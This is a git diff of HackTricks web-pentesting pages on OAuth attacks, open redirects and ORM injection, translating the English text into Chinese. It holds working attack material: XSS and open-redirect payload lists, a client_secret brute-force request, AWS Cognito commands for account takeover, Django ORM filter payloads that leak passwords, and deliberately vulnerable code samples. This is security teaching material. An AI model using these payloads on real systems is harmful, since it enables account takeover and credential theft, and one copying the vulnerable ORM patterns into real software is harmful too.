+`redirect_uri` 对于 OAuth 和 OpenID 实现的安全性至关重要，因为它指示在授权后敏感数据（如授权代码）发送到何处。如果配置错误，可能会允许攻击者将这些请求重定向到恶意服务器，从而实现账户接管。
 
-The `redirect_uri` is crucial for security in OAuth and OpenID implementations, as it directs where sensitive data, like authorization codes, are sent post-authorization. If misconfigured, it could allow attackers to redirect these requests to malicious servers, enabling account takeover.
+利用技术根据授权服务器的验证逻辑而异。它们可以从严格的路径匹配到接受指定域或子目录内的任何 URL。常见的利用方法包括开放重定向、路径遍历、利用弱正则表达式和 HTML 注入进行令牌窃取。
 
-Exploitation techniques vary based on the authorization server's validation logic. They can range from strict path matching to accepting any URL within the specified domain or subdirectory. Common exploitation methods include open redirects, path traversal, exploiting weak regexes, and HTML injection for token theft.
+除了 `redirect_uri`，其他 OAuth 和 OpenID 参数如 `client_uri`、`policy_uri`、`tos_uri` 和 `initiate_login_uri` 也容易受到重定向攻击。这些参数是可选的，其支持在不同服务器之间有所不同。
 
-Besides `redirect_uri`, other OAuth and OpenID parameters like `client_uri`, `policy_uri`, `tos_uri`, and `initiate_login_uri` are also susceptible to redirection attacks. These parameters are optional and their support varies across servers.
+对于那些针对 OpenID 服务器的攻击者，发现端点（`**.well-known/openid-configuration**`）通常列出有价值的配置细节，如 `registration_endpoint`、`request_uri_parameter_supported` 和 "`require_request_uri_registration`。这些细节可以帮助识别注册端点和服务器的其他配置细节。
 
-For those targeting an OpenID server, the discovery endpoint (`**.well-known/openid-configuration**`) often lists valuable configuration details like `registration_endpoint`, `request_uri_parameter_supported`, and "`require_request_uri_registration`. These details can aid in identifying the registration endpoint and other configuration specifics of the server.
-
-### XSS in redirect implementation <a href="#bda5" id="bda5"></a>
-
-As mentioned in this bug bounty report [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) it might be possible that the redirect **URL is being reflected in the response** of the server after the user authenticates, being **vulnerable to XSS**. Possible payload to test:
+### 重定向实现中的 XSS <a href="#bda5" id="bda5"></a>
 
+正如在这个漏洞赏金报告中提到的 [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html)，重定向 **URL 可能在用户认证后反映在服务器的响应中**，因此 **容易受到 XSS 攻击**。可能的测试有效载荷：
 ```
 https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</script><h1>test</h1>
 ```
+### CSRF - 不当处理状态参数 <a href="#bda5" id="bda5"></a>
 
-### CSRF - Improper handling of state parameter <a href="#bda5" id="bda5"></a>
+在OAuth实现中，**`state`参数**的误用或遗漏会显著增加**跨站请求伪造（CSRF）**攻击的风险。当`state`参数**未使用、作为静态值使用或未正确验证**时，攻击者可以绕过CSRF保护。
 
-In OAuth implementations, the misuse or omission of the **`state` parameter** can significantly increase the risk of **Cross-Site Request Forgery (CSRF)** attacks. This vulnerability arises when the `state` parameter is either **not used, used as a static value, or not properly validated**, allowing attackers to bypass CSRF protections.
+攻击者可以通过拦截授权过程，将他们的账户与受害者的账户链接，从而导致潜在的**账户接管**。在使用OAuth进行**身份验证**的应用程序中，这尤其关键。
 
-Attackers can exploit this by intercepting the authorization process to link their account with a victim's account, leading to potential **account takeovers**. This is especially critical in applications where OAuth is used for **authentication purposes**.
+在各种**CTF挑战**和**黑客平台**中记录了此漏洞的真实案例，突显了其实际影响。该问题还扩展到与第三方服务的集成，如**Slack**、**Stripe**和**PayPal**，攻击者可以将通知或付款重定向到他们的账户。
 
-Real-world examples of this vulnerability have been documented in various **CTF challenges** and **hacking platforms**, highlighting its practical implications. The issue also extends to integrations with third-party services like **Slack**, **Stripe**, and **PayPal**, where attackers can redirect notifications or payments to their accounts.
+正确处理和验证**`state`参数**对于防范CSRF和保护OAuth流程至关重要。
 
-Proper handling and validation of the **`state` parameter** are crucial for safeguarding against CSRF and securing the OAuth flow.
+### 预账户接管 <a href="#ebe4" id="ebe4"></a>
 
-### Pre Account Takeover <a href="#ebe4" id="ebe4"></a>
+1. **在账户创建时未进行电子邮件验证**：攻击者可以预先使用受害者的电子邮件创建账户。如果受害者稍后使用第三方服务登录，应用程序可能会不经意地将此第三方账户链接到攻击者预先创建的账户，从而导致未经授权的访问。
+2. **利用宽松的OAuth电子邮件验证**：攻击者可能会利用不验证电子邮件的OAuth服务，通过注册其服务并将账户电子邮件更改为受害者的电子邮件来进行攻击。这种方法同样存在未经授权的账户访问风险，类似于第一种情况，但通过不同的攻击向量。
 
-1. **Without Email Verification on Account Creation**: Attackers can preemptively create an account using the victim's email. If the victim later uses a third-party service for login, the application might inadvertently link this third-party account to the attacker's pre-created account, leading to unauthorized access.
-2. **Exploiting Lax OAuth Email Verification**: Attackers may exploit OAuth services that don't verify emails by registering with their service and then changing the account email to the victim's. This method similarly risks unauthorized account access, akin to the first scenario but through a different attack vector.
+### 秘密泄露 <a href="#e177" id="e177"></a>
 
-### Disclosure of Secrets <a href="#e177" id="e177"></a>
+识别和保护秘密OAuth参数至关重要。虽然**`client_id`**可以安全披露，但泄露**`client_secret`**会带来重大风险。如果`client_secret`被泄露，攻击者可以利用应用程序的身份和信任来**窃取用户`access_tokens`**和私人信息。
 
-Identifying and protecting secret OAuth parameters is crucial. While the **`client_id`** can be safely disclosed, revealing the **`client_secret`** poses significant risks. If the `client_secret` is compromised, attackers can exploit the identity and trust of the application to **steal user `access_tokens`** and private information.
+一个常见的漏洞出现在应用程序错误地在客户端而非服务器端处理授权`code`与`access_token`的交换。这一错误导致`client_secret`的暴露，使攻击者能够以应用程序的名义生成`access_tokens`。此外，通过社会工程学，攻击者可以通过向OAuth授权添加额外的范围来提升权限，进一步利用应用程序的信任状态。
 
-A common vulnerability arises when applications mistakenly handle the exchange of the authorization `code` for an `access_token` on the client-side rather than the server-side. This mistake leads to the exposure of the `client_secret`, enabling attackers to generate `access_tokens` under the guise of the application. Moreover, through social engineering, attackers could escalate privileges by adding additional scopes to the OAuth authorization, further exploiting the application's trusted status.
-
-### Client Secret Bruteforce
-
-You can try to **bruteforce the client_secret** of a service provider with the identity provider in order to be try to steal accounts.\
-The request to BF may look similar to:
+### 客户端密钥暴力破解
 
+您可以尝试**暴力破解服务提供商的client_secret**与身份提供者，以试图窃取账户。\
+暴力破解的请求可能类似于：
 ```
 POST /token HTTP/1.1
 content-type: application/x-www-form-urlencoded
@@ -117,31 +108,29 @@ Connection: close
 
 code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
 ```
-
 ### Referer Header leaking Code + State
 
-Once the client has the **code and state**, if it's **reflected inside the Referer header** when he browses to a different page, then it's vulnerable.
+一旦客户端拥有了 **code 和 state**，如果它们在浏览到不同页面时 **反映在 Referer 头中**，那么就存在漏洞。
 
 ### Access Token Stored in Browser History
 
-Go to the **browser history and check if the access token is saved in there**.
+前往 **浏览器历史记录并检查访问令牌是否保存在其中**。
 
 ### Everlasting Authorization Code
 
-The **authorization code should live just for some time to limit the time window where an attacker can steal and use it**.
+**授权代码应该只存在一段时间，以限制攻击者可以窃取和使用它的时间窗口**。
 
 ### Authorization/Refresh Token not bound to client
 
-If you can get the **authorization code and use it with a different client then you can takeover other accounts**.
+如果你可以获取 **授权代码并在不同的客户端上使用它，那么你可以接管其他账户**。
 
 ### Happy Paths, XSS, Iframes & Post Messages to leak code & state values
 
-[**Check this post**](https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)
+[**查看此帖子**](https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)
 
 ### AWS Cognito <a href="#bda5" id="bda5"></a>
 
-In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
-
+在这个漏洞赏金报告中：[**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) 你可以看到 **AWS Cognito** 返回给用户的 **token** 可能具有 **足够的权限来覆盖用户数据**。因此，如果你可以 **将用户电子邮件更改为其他用户的电子邮件**，你可能能够 **接管** 其他账户。
 ```bash
 # Read info of the user
 aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@@ -149,87 +138,86 @@ aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
 # Change email address
 aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com
 {
-    "CodeDeliveryDetailsList": [
-        {
-            "Destination": "i***@f***.com",
-            "DeliveryMedium": "EMAIL",
-            "AttributeName": "email"
-        }
-    ]
+"CodeDeliveryDetailsList": [
+{
+"Destination": "i***@f***.com",
+"DeliveryMedium": "EMAIL",
+"AttributeName": "email"
+}
+]
 }
 ```
-
-For more detailed info about how to abuse AWS cognito check:
+对于如何滥用 AWS cognito 的更详细信息，请查看：
 
 {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
 
-### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
+### 滥用其他应用程序令牌 <a href="#bda5" id="bda5"></a>
 
-As [**mentioned in this writeup**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts), OAuth flows that expect to receive the **token** (and not a code) could be vulnerable if they not check that the token belongs to the app.
+正如 [**在这篇文章中提到的**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)，期望接收 **token**（而不是代码）的 OAuth 流程可能会受到攻击，如果它们没有检查该 token 是否属于该应用程序。
 
-This is because an **attacker** could create an **application supporting OAuth and login with Facebook** (for example) in his own application. Then, once a victim logins with Facebook in the **attackers application**, the attacker could get the **OAuth token of the user given to his application, and use it to login in the victim OAuth application using the victims user token**.
+这是因为 **攻击者** 可以在自己的应用程序中创建一个 **支持 OAuth 并使用 Facebook 登录的应用程序**（例如）。然后，一旦受害者在 **攻击者的应用程序** 中使用 Facebook 登录，攻击者就可以获取 **分配给其应用程序的用户的 OAuth token，并使用它在受害者的 OAuth 应用程序中登录，使用受害者的用户 token**。
 
 > [!CAUTION]
-> Therefore, if the attacker manages to get the user access his own OAuth application, he will be able to take over the victims account in applications that are expecting a token and aren't checking if the token was granted to their app ID.
+> 因此，如果攻击者设法让用户访问自己的 OAuth 应用程序，他将能够在期望 token 且未检查 token 是否被授予其应用程序 ID 的应用程序中接管受害者的帐户。
 
-### Two links & cookie <a href="#bda5" id="bda5"></a>
+### 两个链接和 cookie <a href="#bda5" id="bda5"></a>
 
-According to [**this writeup**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), it was possible to make a victim open a page with a **returnUrl** pointing to the attackers host. This info would be **stored in a cookie (RU)** and in a **later step** the **prompt** will **ask** the **user** if he wants to give access to that attackers host.
+根据 [**这篇文章**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)，可以让受害者打开一个指向攻击者主机的 **returnUrl** 的页面。此信息将被 **存储在 cookie (RU)** 中，在 **后续步骤** 中，**提示** 将 **询问** **用户** 是否希望授予对该攻击者主机的访问权限。
 
-To bypass this prompt, it was possible to open a tab to initiate the **Oauth flow** that would set this RU cookie using the **returnUrl**, close the tab before the prompt is shown, and open a new tab without that value. Then, the **prompt won't inform about the attackers host**, but the cookie would be set to it, so the **token will be sent to the attackers host** in the redirection.
+为了绕过此提示，可以打开一个选项卡以启动 **Oauth 流程**，该流程将使用 **returnUrl** 设置此 RU cookie，在提示显示之前关闭选项卡，然后打开一个没有该值的新选项卡。然后，**提示不会通知攻击者的主机**，但 cookie 将被设置为它，因此 **token 将在重定向中发送到攻击者的主机**。
 
-### Prompt Interaction Bypass <a href="#bda5" id="bda5"></a>
+### 提示交互绕过 <a href="#bda5" id="bda5"></a>
 
-As explained in [**this video**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), some OAuth implementations allows to indicate the **`prompt`** GET parameter as None (**`&prompt=none`**) to **prevent users being asked to confirm** the given access in a prompt in the web if they are already logged in the platform.
+正如 [**在这段视频中解释的**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)，某些 OAuth 实现允许将 **`prompt`** GET 参数指示为 None (**`&prompt=none`**) 以 **防止用户在已登录平台时被要求确认** 在网页上授予的访问权限。
 
 ### response_mode
 
-As [**explained in this video**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), it might be possible to indicate the parameter **`response_mode`** to indicate where do you want the code to be provided in the final URL:
+正如 [**在这段视频中解释的**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)，可能可以指示参数 **`response_mode`** 来指示您希望在最终 URL 中提供代码的位置：
 
-- `response_mode=query` -> The code is provided inside a GET parameter: `?code=2397rf3gu93f`
-- `response_mode=fragment` -> The code is provided inside the URL fragment parameter `#code=2397rf3gu93f`
-- `response_mode=form_post` -> The code is provided inside a POST form with an input called `code` and the value
-- `response_mode=web_message` -> The code is send in a post message: `window.opener.postMessage({"code": "asdasdasd...`
+- `response_mode=query` -> 代码在 GET 参数中提供： `?code=2397rf3gu93f`
+- `response_mode=fragment` -> 代码在 URL 片段参数中提供 `#code=2397rf3gu93f`
+- `response_mode=form_post` -> 代码在一个名为 `code` 的 POST 表单中的输入中提供
+- `response_mode=web_message` -> 代码通过 post 消息发送： `window.opener.postMessage({"code": "asdasdasd...`
 
-### OAuth ROPC flow - 2 FA bypass <a href="#b440" id="b440"></a>
+### OAuth ROPC 流程 - 2 FA 绕过 <a href="#b440" id="b440"></a>
 
-According to [**this blog post**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96), this is an OAuth flow that allows to login in OAuth via **username** and **password**. If during this simple flow a **token** with access to all the actions the user can perform is returned then it's possible to bypass 2FA using that token.
+根据 [**这篇博客文章**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96)，这是一个允许通过 **用户名** 和 **密码** 登录 OAuth 的 OAuth 流程。如果在这个简单流程中返回了一个具有用户可以执行的所有操作访问权限的 **token**，那么就可以使用该 token 绕过 2FA。
 
-### ATO on web page redirecting based on open redirect to referrer <a href="#bda5" id="bda5"></a>
+### 基于开放重定向到引荐的网页重定向 ATO <a href="#bda5" id="bda5"></a>
 
-This [**blogpost**](https://blog.voorivex.team/oauth-non-happy-path-to-ato) comments how it was possible to abuse an **open redirect** to the value from the **referrer** to abuse OAuth to ATO. The attack was:
+这篇 [**博客文章**](https://blog.voorivex.team/oauth-non-happy-path-to-ato) 讨论了如何滥用 **开放重定向** 从 **引荐** 的值来滥用 OAuth 进行 ATO。攻击步骤如下：
 
-1. Victim access the attackers web page
-2. The victim opens the malicious link and an opener starts the Google OAuth flow with `response_type=id_token,code&prompt=none` as additional parameters using as **referrer the attackers website**.
-3. In the opener, after the provider authorizes the victim, it sends them back to the value of the `redirect_uri` parameter (victim web) with 30X code which still keeps the attackers website in the referer.
-4. The victim **website trigger the open redirect based on the referrer** redirecting the victim user to the attackers website, as the **`respose_type`** was **`id_token,code`**, the code will be sent back to the attacker in the **fragment** of the URL allowing him to tacke over the account of the user via Google in the victims site.
+1. 受害者访问攻击者的网页
+2. 受害者打开恶意链接，打开者使用 `response_type=id_token,code&prompt=none` 作为附加参数启动 Google OAuth 流程，**引荐为攻击者网站**。
+3. 在打开者中，提供者在授权受害者后，将他们发送回 `redirect_uri` 参数的值（受害者网站），并使用 30X 代码，这仍然保持攻击者网站在引荐中。
+4. 受害者 **网站根据引荐触发开放重定向**，将受害者用户重定向到攻击者网站，因为 **`respose_type`** 是 **`id_token,code`**，代码将通过 URL 的 **片段** 返回给攻击者，从而允许他通过 Google 接管受害者网站的用户帐户。
 
-### SSRFs parameters <a href="#bda5" id="bda5"></a>
+### SSRFs 参数 <a href="#bda5" id="bda5"></a>
 
-[**Check this research**](https://portswigger.net/research/hidden-oauth-attack-vectors) **For further details of this technique.**
+[**查看这项研究**](https://portswigger.net/research/hidden-oauth-attack-vectors) **以获取此技术的更多详细信息。**
 
-Dynamic Client Registration in OAuth serves as a less obvious but critical vector for security vulnerabilities, specifically for **Server-Side Request Forgery (SSRF)** attacks. This endpoint allows OAuth servers to receive details about client applications, including sensitive URLs that could be exploited.
+OAuth 中的动态客户端注册作为一个不太明显但关键的安全漏洞向量，特别是针对 **服务器端请求伪造 (SSRF)** 攻击。此端点允许 OAuth 服务器接收有关客户端应用程序的详细信息，包括可能被利用的敏感 URL。
 
-**Key Points:**
+**关键点：**
 
-- **Dynamic Client Registration** is often mapped to `/register` and accepts details like `client_name`, `client_secret`, `redirect_uris`, and URLs for logos or JSON Web Key Sets (JWKs) via POST requests.
-- This feature adheres to specifications laid out in **RFC7591** and **OpenID Connect Registration 1.0**, which include parameters potentially vulnerable to SSRF.
-- The registration process can inadvertently expose servers to SSRF in several ways:
-  - **`logo_uri`**: A URL for the client application's logo that might be fetched by the server, triggering SSRF or leading to XSS if the URL is mishandled.
-  - **`jwks_uri`**: A URL to the client's JWK document, which if maliciously crafted, can cause the server to make outbound requests to an attacker-controlled server.
-  - **`sector_identifier_uri`**: References a JSON array of `redirect_uris`, which the server might fetch, creating an SSRF opportunity.
-  - **`request_uris`**: Lists allowed request URIs for the client, which can be exploited if the server fetches these URIs at the start of the authorization process.
+- **动态客户端注册** 通常映射到 `/register`，并接受如 `client_name`、`client_secret`、`redirect_uris` 和通过 POST 请求的 logo 或 JSON Web Key Sets (JWKs) 的 URL 等详细信息。
+- 此功能遵循 **RFC7591** 和 **OpenID Connect Registration 1.0** 中列出的规范，其中包括可能对 SSRF 易受攻击的参数。
+- 注册过程可能会以多种方式无意中使服务器暴露于 SSRF：
+- **`logo_uri`**：客户端应用程序 logo 的 URL，服务器可能会获取该 URL，从而触发 SSRF 或导致 XSS（如果 URL 处理不当）。
+- **`jwks_uri`**：客户端的 JWK 文档的 URL，如果恶意构造，可能导致服务器向攻击者控制的服务器发出外部请求。
+- **`sector_identifier_uri`**：引用 `redirect_uris` 的 JSON 数组，服务器可能会获取该数组，从而创建 SSRF 机会。
+- **`request_uris`**：列出客户端允许的请求 URI，如果服务器在授权过程开始时获取这些 URI，则可能被利用。
 
-**Exploitation Strategy:**
+**利用策略：**
 
-- SSRF can be triggered by registering a new client with malicious URLs in parameters like `logo_uri`, `jwks_uri`, or `sector_identifier_uri`.
-- While direct exploitation via `request_uris` may be mitigated by whitelist controls, supplying a pre-registered, attacker-controlled `request_uri` can facilitate SSRF during the authorization phase.
+- 通过在 `logo_uri`、`jwks_uri` 或 `sector_identifier_uri` 等参数中注册带有恶意 URL 的新客户端，可以触发 SSRF。
+- 尽管通过白名单控制可能会减轻直接通过 `request_uris` 的利用，但提供一个预先注册的、攻击者控制的 `request_uri` 可以在授权阶段促进 SSRF。
 
-## OAuth providers Race Conditions
+## OAuth 提供者竞争条件
 
-If the platform you are testing is an OAuth provider [**read this to test for possible Race Conditions**](race-condition.md).
+如果您正在测试的平台是 OAuth 提供者 [**请阅读此内容以测试可能的竞争条件**](race-condition.md)。
 
-## References
+## 参考文献
 
 - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
 - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
@@ -239,4 +227,3 @@ If the platform you are testing is an OAuth provider [**read this to test for po
 {% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index c652963c4..96713f1d1 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -4,20 +4,19 @@
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
 ## Open redirect
 
-### Redirect to localhost or arbitrary domains
+### 重定向到localhost或任意域名
 
 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}
 
 ### Open Redirect to XSS
-
 ```bash
 #Basic payload, javascript code is executed after "javascript:"
 javascript:alert(1)
@@ -63,9 +62,7 @@ javascript://whitelisted.com?%a0alert%281%29
 /x:1/:///%01javascript:alert(document.cookie)/
 ";alert(0);//
 ```
-
-## Open Redirect uploading svg files
-
+## Open Redirect 上传 SVG 文件
 ```markup
 <code>
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@@ -75,9 +72,7 @@ xmlns="http://www.w3.org/2000/svg">
 </svg>
 </code>
 ```
-
-## Common injection parameters
-
+## 常见注入参数
 ```
 /{payload}
 ?next={payload}
@@ -152,23 +147,17 @@ RedirectUrl=https://c1h2e1.github.io
 Redirect=https://c1h2e1.github.io
 ReturnUrl=https://c1h2e1.github.io
 ```
-
-## Code examples
+## 代码示例
 
 #### .Net
-
 ```bash
 response.redirect("~/mysafe-subdomain/login.aspx")
 ```
-
 #### Java
-
 ```bash
 response.redirect("http://mysafedomain.com");
 ```
-
 #### PHP
-
 ```php
 <?php
 /* browser redirections*/
@@ -176,23 +165,21 @@ header("Location: http://mysafedomain.com");
 exit;
 ?>
 ```
-
-## Tools
+## 工具
 
 - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
 
-## Resources
+## 资源
 
-- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.\\
+- 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 你可以找到模糊测试列表。\\
 - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
 - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
 
 <figure><img src="/images/image (2).png" alt=""><figcaption></figcaption></figure>
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证：
 
 {% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/orm-injection.md b/src/pentesting-web/orm-injection.md
index e48834675..168b03b73 100644
--- a/src/pentesting-web/orm-injection.md
+++ b/src/pentesting-web/orm-injection.md
@@ -4,62 +4,55 @@
 
 ## Django ORM (Python)
 
-In [**this post**](https://www.elttam.com/blog/plormbing-your-django-orm/) is explained how it's possible to make a Django ORM vulnerable by using for example a code like:
+在[**这篇文章**](https://www.elttam.com/blog/plormbing-your-django-orm/)中解释了如何通过使用例如以下代码使Django ORM变得脆弱：
 
 <pre class="language-python"><code class="lang-python">class ArticleView(APIView):
-    """
-        Some basic API view that users send requests to for
-        searching for articles
-    """
-    def post(self, request: Request, format=None):
-        try:
+"""
+一些基本的API视图，用户向其发送请求以
+搜索文章
+"""
+def post(self, request: Request, format=None):
+try:
 <strong>            articles = Article.objects.filter(**request.data)
 </strong>            serializer = ArticleSerializer(articles, many=True)
-        except Exception as e:
-            return Response([])
-        return Response(serializer.data)
+except Exception as e:
+return Response([])
+return Response(serializer.data)
 </code></pre>
 
-Note how all the request.data (which will be a json) is directly passed to **filter objects from the database**. An attacker could send unexpected filters in order to leak more data than expected from it.
+注意所有的request.data（这将是一个json）是直接传递给**从数据库中过滤对象**的。攻击者可以发送意外的过滤器，以泄露比预期更多的数据。
 
-Examples:
-
-- **Login:** In a simple login try to leak the passwords of the users registered inside of it.
+示例：
 
+- **登录：** 在简单的登录中尝试泄露注册用户的密码。
 ```json
 {
-  "username": "admin",
-  "password_startswith": "a"
+"username": "admin",
+"password_startswith": "a"
 }
 ```
-
 > [!CAUTION]
-> It's possible to brute-force the password until it's leaked.
-
-- **Relational filtering**: It's possible to traverse relations in order to leak information from columns that weren't even expected to be used in the operation. For example, if it's possible to leak articles created by a user withe these relations: Article(`created_by`) -\[1..1]-> Author (`user`) -\[1..1]-> User(`password`).
+> 可能会通过暴力破解密码直到其泄露。
 
+- **关系过滤**：可以遍历关系以泄露来自未预期在操作中使用的列的信息。例如，如果可以通过以下关系泄露由用户创建的文章：Article(`created_by`) -\[1..1]-> Author (`user`) -\[1..1]-> User(`password`)。
 ```json
 {
-  "created_by__user__password__contains": "pass"
+"created_by__user__password__contains": "pass"
 }
 ```
-
 > [!CAUTION]
-> It's possible to find the password of all the users that have created an article
-
-- **Many-to-many relational filtering**: In the previous example we couldn't find passwords of users that haven't created an article. However, following other relationships this is possible. For example: Article(`created_by`) -\[1..1]-> Author(`departments`) -\[0..\*]-> Department(`employees`) -\[0..\*]-> Author(`user`) -\[1..1]-> User(`password`).
+> 可能会找到所有创建了文章的用户的密码
 
+- **多对多关系过滤**：在前面的例子中，我们无法找到没有创建文章的用户的密码。然而，遵循其他关系这是可能的。例如：Article(`created_by`) -\[1..1]-> Author(`departments`) -\[0..\*]-> Department(`employees`) -\[0..\*]-> Author(`user`) -\[1..1]-> User(`password`).
 ```json
 {
-  "created_by__departments__employees__user_startswith": "admi"
+"created_by__departments__employees__user_startswith": "admi"
 }
 ```
-
 > [!CAUTION]
-> In this case we can find all the users in the departments of users that have created articles and then leak their passwords (in the previous json we are just leaking the usernames but then it's possible to leak the passwords).
-
-- **Abusing Django Group and Permission many-to-may relations with users**: Moreover, the AbstractUser model is used to generate users in Django and by default this model has some **many-to-many relationships with the Permission and Group tables**. Which basically is a default way to **access other users from one user** if they are in the **same group or share the same permission**.
+> 在这种情况下，我们可以找到所有在创建文章的用户部门中的用户，然后泄露他们的密码（在之前的json中我们只是泄露了用户名，但随后可以泄露密码）。
 
+- **滥用Django组和权限的多对多关系与用户**：此外，AbstractUser模型用于在Django中生成用户，默认情况下该模型与权限和组表具有一些**多对多关系**。这基本上是**从一个用户访问其他用户**的默认方式，如果他们在**同一组或共享相同权限**。
 ```bash
 # By users in the same group
 created_by__user__groups__user__password
@@ -67,268 +60,242 @@ created_by__user__groups__user__password
 # By users with the same permission
 created_by__user__user_permissions__user__password
 ```
-
-- **Bypass filter restrictions**: The same blogpost proposed to bypass the use of some filtering like `articles = Article.objects.filter(is_secret=False, **request.data)`. t's possible to dump articles that have is_secret=True because we can loop back from a relationship to the Article table and leak secret articles from non secret articles because the results are joined and the is_secret field is checked in the non secret article while the data is leaked from the secret article.
-
+- **绕过过滤限制**: 同一篇博客文章建议绕过某些过滤的使用，例如 `articles = Article.objects.filter(is_secret=False, **request.data)`。可以转储 is_secret=True 的文章，因为我们可以从关系回溯到 Article 表，并从非秘密文章中泄露秘密文章，因为结果是连接的，并且在非秘密文章中检查 is_secret 字段，而数据是从秘密文章中泄露的。
 ```bash
 Article.objects.filter(is_secret=False, categories__articles__id=2)
 ```
-
 > [!CAUTION]
-> Abusing relationships it's possible to bypass even filters meant to protect the data shown.
-
-- **Error/Time based via ReDoS**: In the previous examples it was expected to have different responses if the filtering worked or not to use that as oracle. But it could be possible that some action is done in the database and the response is always the same. In this scenario it could be possible to make the database error to get a new oracle.
+> 滥用关系可以绕过即使是旨在保护所显示数据的过滤器。
 
+- **基于错误/时间的 ReDoS**：在之前的示例中，如果过滤工作正常，预期会有不同的响应以用作神谕。但也可能在数据库中执行某些操作，响应始终相同。在这种情况下，可以使数据库错误以获取新的神谕。
 ```json
 // Non matching password
 {
-    "created_by__user__password__regex": "^(?=^pbkdf1).*.*.*.*.*.*.*.*!!!!$"
+"created_by__user__password__regex": "^(?=^pbkdf1).*.*.*.*.*.*.*.*!!!!$"
 }
 
 // ReDoS matching password (will show some error in the response or check the time)
 {"created_by__user__password__regex": "^(?=^pbkdf2).*.*.*.*.*.*.*.*!!!!$"}
 ```
-
-From te same post regarding this vector:
-
-- **SQLite**: Doesn't have a regexp operator by default (require loading a third-party extension)
-- **PostgreSQL**: Doesn't have a default regex timeout and it's less prone to backtracking
-- **MariaDB**: Doesn't have a regex timeout
+- **SQLite**: 默认情况下没有 regexp 操作符（需要加载第三方扩展）
+- **PostgreSQL**: 没有默认的正则超时，并且不太容易回溯
+- **MariaDB**: 没有正则超时
 
 ## Prisma ORM (NodeJS)
 
-The following are [**tricks extracted from this post**](https://www.elttam.com/blog/plorming-your-primsa-orm/).
+以下是 [**从此帖子提取的技巧**](https://www.elttam.com/blog/plorming-your-primsa-orm/)。
 
-- **Full find contro**l:
+- **完全查找控制**:
 
 <pre class="language-javascript"><code class="lang-javascript">const app = express();
 
 app.use(express.json());
 
 app.post('/articles/verybad', async (req, res) => {
-    try {
